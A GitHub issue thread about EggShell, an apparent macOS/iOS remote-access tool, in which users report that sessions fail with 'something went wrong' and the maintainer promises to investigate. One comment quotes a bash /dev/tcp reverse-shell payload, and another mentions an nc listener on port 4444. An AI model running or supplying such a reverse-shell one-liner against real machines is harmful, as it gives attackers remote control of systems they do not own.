EggShell icon indicating copy to clipboard operation
EggShell copied to clipboard

Failed

Open MircoCagni opened this issue 7 years ago • 10 comments

I have try to use this exploit on a VM with Mac OS X Sierra, but the responde is wrong error

MircoCagni avatar Apr 09 '17 18:04 MircoCagni

can you be more specific?

lucasjacks0n avatar Apr 09 '17 18:04 lucasjacks0n

Yes, sorry, i have create a payload with my Parrot OS using eggshell "bash &> /dev/tcp/192.168.0.10/4444 0>&1 " and i have start server. But When i go to write my payload in OS X terminal the response is this:

" [] Listening on port 4444 [] Connecting to 192.168.0.11 [] Detected OS X [] Sending Payload [] Waiting For Connection. . . [] Type "help" for commands went wrong> "

and if i lunch a command for example "pwd" it print the error "something went wrong"

MircoCagni avatar Apr 09 '17 18:04 MircoCagni

ok, I will look into this

lucasjacks0n avatar Apr 09 '17 19:04 lucasjacks0n

Looks like the same error i got with ls

shellbear avatar Apr 09 '17 19:04 shellbear

this is on startup though, its not receiving the computer name

lucasjacks0n avatar Apr 09 '17 20:04 lucasjacks0n

How can I solve this problem

MircoCagni avatar Apr 09 '17 21:04 MircoCagni

I don't know what is causing it yet

lucasjacks0n avatar Apr 09 '17 22:04 lucasjacks0n

I will look into it

lucasjacks0n avatar Apr 09 '17 22:04 lucasjacks0n

I try to use it to iPhone5(iOS7.1.2) and Mac OS X Sierra , went wrong also

EggShell> 1
SET LHOST (Leave blank for 10.100.78.208)>192.168.2.1
[*]  LHOST = 192.168.2.1
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
[*]  Listening on port 4444...
[*]  Connecting to 192.168.2.7
[*]  Detected iOS
[*]  Sending Payload
[*]  Waiting For Connection...
[*]  type "help" for commands
went wrong> ls
something went wrong
went wrong> 

but if i use nc -vv -l 4444 in Mac OS X Sierra I can successfully execute the shell command

Loveforkeeps avatar Apr 26 '17 12:04 Loveforkeeps

I have exactly the same issue

shellbear avatar Apr 26 '17 12:04 shellbear